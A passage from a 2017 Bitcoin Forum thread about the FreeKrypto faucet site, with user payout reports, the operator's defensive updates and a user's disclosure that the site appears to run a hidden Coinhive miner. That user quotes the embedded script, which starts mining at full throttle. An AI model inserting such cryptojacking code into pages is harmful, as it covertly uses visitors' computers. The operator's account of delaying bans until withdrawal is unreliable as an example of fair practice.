Bitcoin Forum
April 25, 2024, 12:13:35 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 [2]  All
  Print  
Author Topic: FreeKrypto.com - Earn upto 500 Satoshi's (30% Commissions) NO POP-UP ADS  (Read 986 times)
dbooster

Activity: 45
Merit: 0

View Profile
November 11, 2017, 04:03:28 PM

I receiver a payout from them just this morning.

https://dl.dropbox.com/s/gp81eh0iiu5o1t5/krypto%20payout.png

I don't know why but I don't believe you... may be you are the administrator???
and where is the administrator, why he don't answer to me?

Cheesy

haha well if you don't believe even image proof, I can't help you. I don't know if it will keep paying, but at least it paid me, so I am happy.

As to why he doesn't answer... no idea. That in and of itself is no indication of anything. After all, the admin of the moon sites, coinpot, etc, never replies on here or to email, yet his sites keep working.

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
Whoever mines the block which ends up containing your transaction will get its fee.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
minthit

Activity: 325
Merit: 11

View Profile
November 14, 2017, 02:36:32 PM

I received 2 payments before. I just don't want to upload an image here because I'm lazy.Cheesy But, for now, it says faucethub proceed error and they said 'they can't refill their balance to faucethub because of tight transaction' and also said not to worry. So, I think it's still legit and am waiting for payout. Have no idea about later though.Smiley
FreeKrypto (OP)

Activity: 9

View Profile
November 14, 2017, 11:33:37 PM
Last edit: November 14, 2017, 11:52:45 PM by FreeKrypto

Withdrawals are now being processed. Most of you will have received the payout automatically on your Faucet HUB account. If you still haven't received, you can go to the website (www.FreeKrypto.com) and request a payout there. You may also contact us through email (hello@freekrypto.com) for further assistance.

https://i.imgur.com/k2CSDCd.png

We are depositing more BTC into our Faucet HUB account:
https://blockchain.info/tx/b2b254324eb8122cc81484bf5d93a2a4fe3f6e0880ca5e4913e3e998acf5b418

*Note that BTC transactions are taking extremely long time to confirm, so please be patient. You will receive your Sats.

As for people who have been on-hold or banned.
We have strict rules in place regarding the use of automated procedures to make claims. As well as using the site with ad-block.
If our systems detect ANY use of automated claims or the use of ad-block on our site, your account will automatically be banned without any notice.

So, if your account is on-hold or banned. There is no resolution. You may create a new account and use the site according to the rules.

Finally, I do have a full-day-time job and a blessed life and can not always respond. Before calling something "fake" or a "scam" do some research, go on the site and check the status or email and be patient.

Thanks.

P.S. Just to clear up something to all the nitwits because it seems all the emails I ever get is people asking if it's scam or if we're actually paying out. YES, we are paying out our users and WILL continue to do so.

Just like a business, we have a plan in place (which 99.9% of Faucet owners usually don't) and are running our faucet according to that. IF we ever decide to go bankrupt or shut operation, we will make a public announcement on our site, we will disable the claim button and PAYOUT ALL USERS before shutting down. I'm not interested in running away with couple of your Satoshi's, I have morals.

If you're still not convinced or don't like how we operate, please stop using our site. simple!
Adam556

Activity: 953
Merit: 102

★★ freecoyn.com ★★

View Profile WWW
November 15, 2017, 03:43:37 PM

Withdrawals are now being processed. Most of you will have received the payout automatically on your Faucet HUB account. If you still haven't received, you can go to the website (www.FreeKrypto.com) and request a payout there. You may also contact us through email (hello@freekrypto.com) for further assistance.

We are depositing more BTC into our Faucet HUB account:
https://blockchain.info/tx/b2b254324eb8122cc81484bf5d93a2a4fe3f6e0880ca5e4913e3e998acf5b418

*Note that BTC transactions are taking extremely long time to confirm, so please be patient. You will receive your Sats.

As for people who have been on-hold or banned.
We have strict rules in place regarding the use of automated procedures to make claims. As well as using the site with ad-block.
If our systems detect ANY use of automated claims or the use of ad-block on our site, your account will automatically be banned without any notice.

So, if your account is on-hold or banned. There is no resolution. You may create a new account and use the site according to the rules.

Finally, I do have a full-day-time job and a blessed life and can not always respond. Before calling something "fake" or a "scam" do some research, go on the site and check the status or email and be patient.

Thanks.

P.S. Just to clear up something to all the nitwits because it seems all the emails I ever get is people asking if it's scam or if we're actually paying out. YES, we are paying out our users and WILL continue to do so.

Just like a business, we have a plan in place (which 99.9% of Faucet owners usually don't) and are running our faucet according to that. IF we ever decide to go bankrupt or shut operation, we will make a public announcement on our site, we will disable the claim button and PAYOUT ALL USERS before shutting down. I'm not interested in running away with couple of your Satoshi's, I have morals.

If you're still not convinced or don't like how we operate, please stop using our site. simple!

Fair play. Sounds legit to me.

>> THECRYPTOADVISER.CO.UK - Crypto blog, guides, features & news <<
>> Freebitco.in - Win a LAMBO! Faucet, betting + EARN INTEREST on your BTC <<
>> Cointiply - high paying SURVEYS, BTC faucet, videos, Jackpot, PPC, PVP game soon <<
FreeKrypto (OP)

Activity: 9

View Profile
November 15, 2017, 08:07:13 PM

Once again, I'll provide another mini-update because I'm receiving ton of emails regarding why withdraw limit is set 5000 Sats. Most of the traffic is coming through this forums so I'll mention it here to help some folks out.

The short and simple reason why withdraw limit is set to 5000 Sats is because it gives us enough time to catch bots.

We have our own custom script that evaluates all claims and gathers data and checks for certain patterns. By the time a user has reached the withdraw limit the script would have gathered enough data to identify a common pattern that results from using a bot.

So, we flag that user and when they request withdraw, WE BAN THAT MOTHEr.......R - God, I love this part. We don't just ban when we find out, we wait until they request withdraw because its more fun.
ilvbtc
Legendary

Activity: 1638
Merit: 1001

View Profile
November 23, 2017, 06:08:52 AM

Looks everything is fine here, 'faucethub error' when a withdrawl is made appears though.
And most importantly,seems you are using the bloody  hidden 'conhive miner'.
Am I right?
You should have seen that there is an 'option' for mining at the least.
This is what I found 'behind the screen':
'</script>

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
   <script>

var miner = new CoinHive.User('ccY4VFSxkczdcroxyI0o7JXmpEA8Z1J1', 'http://freekrypto.com/', {
            threads: 30,
            autoThreads: 'false',
            throttle: 0,
            forceASMJS: false
         });
      miner.start();
         </script>'

andreynev77

Activity: 5

View Profile
November 23, 2017, 06:08:47 PM